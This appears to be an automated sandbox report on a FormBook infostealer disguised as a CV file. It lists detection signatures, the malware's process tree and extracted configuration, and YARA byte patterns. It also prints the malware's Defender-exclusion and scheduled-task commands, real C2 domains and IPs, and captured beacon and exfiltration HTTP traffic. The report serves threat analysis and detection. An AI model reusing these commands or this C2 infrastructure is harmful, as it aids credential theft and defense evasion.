Edit tour

Windows Analysis Report
CV.bat.exe

Overview

General Information

Sample Name:	CV.bat.exe
Analysis ID:	715070
MD5:	40372d67f0de4526f04fba7948f7ff02
SHA1:	f1c8f97bd587125f6c48fb5e80bd191bff253a97
SHA256:	8bdbc254d871d5f2ffbdc50ea20070910cfa9c1be2b114ae1077ebc7b6d245d2
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Sigma detected: Scheduled temp file as task from temp location

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Deletes itself after installation

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

CV.bat.exe (PID: 6056 cmdline: C:\Users\user\Desktop\CV.bat.exe MD5: 40372D67F0DE4526F04FBA7948F7FF02)

powershell.exe (PID: 5156 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 5152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5148 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

CV.bat.exe (PID: 5060 cmdline: C:\Users\user\Desktop\CV.bat.exe MD5: 40372D67F0DE4526F04FBA7948F7FF02)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

chkdsk.exe (PID: 1264 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.miarizzuto.org/redb/"], "decoy": ["p38MheawG5TlW4TfEW6HgnBkENlaHA==", "F+wu9lADd7UfKolzCb9JriAY5iBtDQ==", "PMgcpd10tc8LZXzLxv4=", "4aYRlQCb7ZZngur8q5Rm3kIG7S0=", "gae+T40jXAwQNntTjeU=", "nDNoH34RcgfW/T4Ywoj4GxdCtw==", "FubuYrVZyeowZKOpSkjwGxdCtw==", "NsZyQ5lBhfS7M1Yx4Q==", "ShBaHnokZaIGGCu+v/w=", "lWJW3gysIs6U7DGWty1OHzCrue9z", "qsjESV5CtJxV0SgCbsJewg==", "P+EX8vkyJWffLEtt97JEwA==", "z/cJhdNs94kvQZJi2VN6Q+7grOZx", "AdeUdb1hY9RKdOmFObn0", "4IR+FFv7MeHN6Cf+bsJewg==", "1qYHwBCj8omX9xww4w==", "EqleInYijmBzntqzWkNfsmA=", "wdDzwzcDOKBinhcAbsJewg==", "krhiJnYVgPe19Ug47cFafWXBYNNeHA==", "XvZT4SS4I5z7I4KPKwE1rUXn", "3+jWW9Cjn6CDtRam33vCu29XvQ==", "fixwUsqR/Bhvoxelu8p62kIG7S0=", "+xZKR0ZmPHiNmA==", "s+wCc7RamYK1zRtqV4tu20IG7S0=", "Adpp4DwAZvKTqQTutY78GxdCtw==", "ENoh3DrcN71TZZ7yuDwz7hb4", "hVdX90DrOpYeTLlSjDqBHsUhvw==", "JLDfpyXXPZoFE3hUyUMtOjPw", "vcxK310Uizkei4li+g==", "jVoz8Wo8fftcy0Y19A==", "/9NY2EQWgeFpnOE4PpKhiEIG7S0=", "VWWBP5ApimC5WSu+v/w=", "/4jic9h447GVpPjaiJJDt1OWV9Tjrj8=", "Q3IXW01pPHiNmA==", "zu5p800BTjnc+HBX", "sHpILIYjPHiNmA==", "kzZ3NXccc1VJU6b8CQlYPzCgLCU=", "JkDjrfap8OwGNo5l7b9NWnBWAjF/FA==", "eZ7YtfuZDNykFpLz6w==", "+xCzdKQ4l9xjnPSCps41rUXn", "AMBRFYdNtwxsbtm0MnMRgmA=", "0PqdgNaF09X4IpumBiOU2w==", "LDOgG3QmrIdnh8xlQdT+", "WHr+gr5vzOwXZXzLxv4=", "1HCmeNBTwkgPOjMZues=", "Ey2VG0fZDBIARaZZ", "omKAbliAi+N88WFM", "o8Istv946qZPd/DSVxaBI4qcKDo=", "yJ7urxrQGzh79xww4w==", "gSagOLSM94AnZcIgNHEE7BT4", "Qw4NhuR+4wY8YNlKd/QdAD0o6KjhuZtdtA==", "fpkQmAa5Mc1bbcRlQdT+", "WCBsPKxZzVzxCUvUCwdC1Hc=", "jjsM3i7VLQYqPqEIITscq1fmBgp5Aw==", "RdisRWOCpYiFmQ==", "Hry/mxIQHqRu", "7fuXY96T/ZEkivUHv5X2", "xtp9W9eNjxd/5Oc6RFa1YB5DtQ==", "pMfOU5EWV01pdcMiPlQNWrZT/zQ=", "jUmgKGL5a/tcy0Y19A==", "pkrCW5s1rBqi3FXkFa4A3QGrue9z", "uYslkvGb8iFcy0Y19A==", "S9y7PZ5kwHP1PZLg2vCU3Q==", "DalTG28tlbdvpPQ="]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f230:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa97f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17eb7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17cb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17761:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17db7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17f2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa54a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x169ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ef9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a179:$sqlite3step: 68 34 1C 7B E1 0x1acf1:$sqlite3step: 68 34 1C 7B E1 0x1a1bb:$sqlite3text: 68 38 2A 90 C5 0x1ad36:$sqlite3text: 68 38 2A 90 C5 0x1a1d2:$sqlite3blob: 68 53 D8 7F 8C 0x1ad4c:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.418181649.0000000000DE0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0xa97f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10230:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8eb7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8cb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8761:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8db7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8f2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x79ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xee87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xff9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb179:$sqlite3step: 68 34 1C 7B E1 0xbcf1:$sqlite3step: 68 34 1C 7B E1 0xb1bb:$sqlite3text: 68 38 2A 90 C5 0xbd36:$sqlite3text: 68 38 2A 90 C5 0xb1d2:$sqlite3blob: 68 53 D8 7F 8C 0xbd4c:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f230:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa97f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17eb7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17cb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17761:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17db7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17f2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa54a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x169ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ef9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a179:$sqlite3step: 68 34 1C 7B E1 0x1acf1:$sqlite3step: 68 34 1C 7B E1 0x1a1bb:$sqlite3text: 68 38 2A 90 C5 0x1ad36:$sqlite3text: 68 38 2A 90 C5 0x1a1d2:$sqlite3blob: 68 53 D8 7F 8C 0x1ad4c:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6d38:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f967:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb0b6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x185ee:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x183ec:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17e98:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x184ee:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x18666:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xac81:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x170e3:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1e5be:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f6d1:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a8b0:$sqlite3step: 68 34 1C 7B E1 0x1b428:$sqlite3step: 68 34 1C 7B E1 0x1a8f2:$sqlite3text: 68 38 2A 90 C5 0x1b46d:$sqlite3text: 68 38 2A 90 C5 0x1a909:$sqlite3blob: 68 53 D8 7F 8C 0x1b483:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f230:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa97f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17eb7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17cb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17761:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17db7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17f2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa54a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x169ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ef9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a179:$sqlite3step: 68 34 1C 7B E1 0x1acf1:$sqlite3step: 68 34 1C 7B E1 0x1a1bb:$sqlite3text: 68 38 2A 90 C5 0x1ad36:$sqlite3text: 68 38 2A 90 C5 0x1a1d2:$sqlite3blob: 68 53 D8 7F 8C 0x1ad4c:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: CV.bat.exe PID: 6056	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: CV.bat.exe PID: 5060	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xf38e6:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: chkdsk.exe PID: 1264	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x42890:$a1: 3C 30 50 4F 53 54 74 09 40 0x1053ae:$a1: 3C 30 50 4F 53 54 74 09 40 0x1b58a7:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 20 entries

Sigma Signatures

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\CV.bat.exe, ParentImage: C:\Users\user\Desktop\CV.bat.exe, ParentProcessId: 6056, ParentProcessName: CV.bat.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp, ProcessId: 5148, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: CV.bat.exe	ReversingLabs: Detection: 33%
Source: CV.bat.exe	Virustotal: Detection: 34%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

ReversingLabs: Detection: 33%

Machine Learning detection for sample

Source: CV.bat.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

Joe Sandbox ML: detected

Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.miarizzuto.org/redb/"], "decoy": ["p38MheawG5TlW4TfEW6HgnBkENlaHA==", "F+wu9lADd7UfKolzCb9JriAY5iBtDQ==", "PMgcpd10tc8LZXzLxv4=", "4aYRlQCb7ZZngur8q5Rm3kIG7S0=", "gae+T40jXAwQNntTjeU=", "nDNoH34RcgfW/T4Ywoj4GxdCtw==", "FubuYrVZyeowZKOpSkjwGxdCtw==", "NsZyQ5lBhfS7M1Yx4Q==", "ShBaHnokZaIGGCu+v/w=", "lWJW3gysIs6U7DGWty1OHzCrue9z", "qsjESV5CtJxV0SgCbsJewg==", "P+EX8vkyJWffLEtt97JEwA==", "z/cJhdNs94kvQZJi2VN6Q+7grOZx", "AdeUdb1hY9RKdOmFObn0", "4IR+FFv7MeHN6Cf+bsJewg==", "1qYHwBCj8omX9xww4w==", "EqleInYijmBzntqzWkNfsmA=", "wdDzwzcDOKBinhcAbsJewg==", "krhiJnYVgPe19Ug47cFafWXBYNNeHA==", "XvZT4SS4I5z7I4KPKwE1rUXn", "3+jWW9Cjn6CDtRam33vCu29XvQ==", "fixwUsqR/Bhvoxelu8p62kIG7S0=", "+xZKR0ZmPHiNmA==", "s+wCc7RamYK1zRtqV4tu20IG7S0=", "Adpp4DwAZvKTqQTutY78GxdCtw==", "ENoh3DrcN71TZZ7yuDwz7hb4", "hVdX90DrOpYeTLlSjDqBHsUhvw==", "JLDfpyXXPZoFE3hUyUMtOjPw", "vcxK310Uizkei4li+g==", "jVoz8Wo8fftcy0Y19A==", "/9NY2EQWgeFpnOE4PpKhiEIG7S0=", "VWWBP5ApimC5WSu+v/w=", "/4jic9h447GVpPjaiJJDt1OWV9Tjrj8=", "Q3IXW01pPHiNmA==", "zu5p800BTjnc+HBX", "sHpILIYjPHiNmA==", "kzZ3NXccc1VJU6b8CQlYPzCgLCU=", "JkDjrfap8OwGNo5l7b9NWnBWAjF/FA==", "eZ7YtfuZDNykFpLz6w==", "+xCzdKQ4l9xjnPSCps41rUXn", "AMBRFYdNtwxsbtm0MnMRgmA=", "0PqdgNaF09X4IpumBiOU2w==", "LDOgG3QmrIdnh8xlQdT+", "WHr+gr5vzOwXZXzLxv4=", "1HCmeNBTwkgPOjMZues=", "Ey2VG0fZDBIARaZZ", "omKAbliAi+N88WFM", "o8Istv946qZPd/DSVxaBI4qcKDo=", "yJ7urxrQGzh79xww4w==", "gSagOLSM94AnZcIgNHEE7BT4", "Qw4NhuR+4wY8YNlKd/QdAD0o6KjhuZtdtA==", "fpkQmAa5Mc1bbcRlQdT+", "WCBsPKxZzVzxCUvUCwdC1Hc=", "jjsM3i7VLQYqPqEIITscq1fmBgp5Aw==", "RdisRWOCpYiFmQ==", "Hry/mxIQHqRu", "7fuXY96T/ZEkivUHv5X2", "xtp9W9eNjxd/5Oc6RFa1YB5DtQ==", "pMfOU5EWV01pdcMiPlQNWrZT/zQ=", "jUmgKGL5a/tcy0Y19A==", "pkrCW5s1rBqi3FXkFa4A3QGrue9z", "uYslkvGb8iFcy0Y19A==", "S9y7PZ5kwHP1PZLg2vCU3Q==", "DalTG28tlbdvpPQ="]}

Source: CV.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: CV.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: CV.bat.exe, 00000008.00000003.301579831.0000000001080000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000003.297213118.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.417519841.00000000054B4000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.531741340.0000000005800000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.421300076.000000000566D000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.533143376.000000000591F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: CV.bat.exe, CV.bat.exe, 00000008.00000003.301579831.0000000001080000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000003.297213118.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.417519841.00000000054B4000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.531741340.0000000005800000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.421300076.000000000566D000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.533143376.000000000591F000.00000040.00000800.00020000.00000000.sdmp

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.hipnoterapia.store
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 63.141.242.46 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.yaignars.site
Source: C:\Windows\explorer.exe	Domain query: www.miarizzuto.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.miarizzuto.org/redb/

Source: Joe Sandbox View

ASN Name: SEDO-ASDE SEDO-ASDE

Source: global traffic	HTTP traffic detected: GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=ClEE/ZchhSWI9Fw4wt/3uVHiPVKnhBdsoB1lL7XTwBZGLskW0dT3J+GyfBiSRlOqjq3/13+wQlUMF9TRa7Zw+CqEhvu+ka1r7A== HTTP/1.1Host: www.miarizzuto.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=sSqPgCldjkbi0+fTeRrTo1yeRkXijBFS3eCOWeLwWqlRfT02SfRof0res+4jmsjJUPdu+dXwzSVFQdySZWLfkZF8oXotr+qwUQ== HTTP/1.1Host: www.yaignars.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 91.195.240.94 91.195.240.94

Source: global traffic	HTTP traffic detected: POST /redb/ HTTP/1.1Host: www.yaignars.siteConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.yaignars.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.yaignars.site/redb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 37 50 4c 37 55 67 7a 45 72 67 32 41 54 57 33 4c 6c 6e 67 71 68 73 62 6d 56 63 54 41 64 63 31 4d 56 77 31 56 41 50 64 5f 65 6c 61 43 6f 50 41 6a 74 4f 66 56 53 2d 42 32 70 39 54 6f 74 41 41 67 55 65 6d 66 43 48 7a 61 75 2d 6f 57 6e 42 73 54 69 39 33 62 52 47 30 47 69 32 45 74 65 6a 63 51 69 55 6e 33 7e 52 64 4c 72 39 67 53 30 44 74 7a 57 7a 32 69 4e 4b 7a 65 49 35 54 77 71 67 76 4c 28 66 7e 6f 54 70 55 31 6d 50 6a 7a 34 6f 56 33 77 34 62 4f 33 36 37 47 66 78 74 2d 55 63 68 42 69 73 62 36 59 65 68 6c 72 72 47 30 56 73 61 57 33 41 6a 34 6e 59 52 73 34 51 76 5a 6d 54 52 31 43 4e 6f 4f 6c 35 6f 31 28 6c 50 61 35 32 41 31 57 65 75 5f 6b 59 5a 69 71 6f 39 66 55 6b 4d 30 4a 4f 41 77 79 4d 42 41 72 34 61 2d 65 76 62 45 51 6c 45 48 50 33 42 77 70 43 71 2d 31 44 50 53 32 73 6f 55 46 43 55 51 57 66 68 58 54 65 79 4e 45 56 53 51 38 76 28 48 68 30 45 52 71 41 30 33 64 55 75 4a 63 78 4f 77 42 4a 38 61 49 68 65 36 28 37 38 6c 65 66 37 62 4a 74 48 75 72 66 67 65 79 78 78 72 4b 4c 33 2d 41 76 6a 63 4f 78 51 34 67 73 70 6c 58 69 5a 6f 58 4f 45 53 6b 53 5a 71 57 65 44 76 41 61 38 51 6e 61 44 6b 49 77 42 48 55 7a 79 68 76 7a 42 49 37 65 56 6f 33 4b 69 48 64 6b 41 4e 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: WvMH=hQCvjyR4iH7W7PL7UgzErg2ATW3LlngqhsbmVcTAdc1MVw1VAPd_elaCoPAjtOfVS-B2p9TotAAgUemfCHzau-oWnBsTi93bRG0Gi2EtejcQiUn3~RdLr9gS0DtzWz2iNKzeI5TwqgvL(f~oTpU1mPjz4oV3w4bO367Gfxt-UchBisb6YehlrrG0VsaW3Aj4nYRs4QvZmTR1CNoOl5o1(lPa52A1Weu_kYZiqo9fUkM0JOAwyMBAr4a-evbEQlEHP3BwpCq-1DPS2soUFCUQWfhXTeyNEVSQ8v(Hh0ERqA03dUuJcxOwBJ8aIhe6(78lef7bJtHurfgeyxxrKL3-AvjcOxQ4gsplXiZoXOESkSZqWeDvAa8QnaDkIwBHUzyhvzBI7eVo3KiHdkANRg).
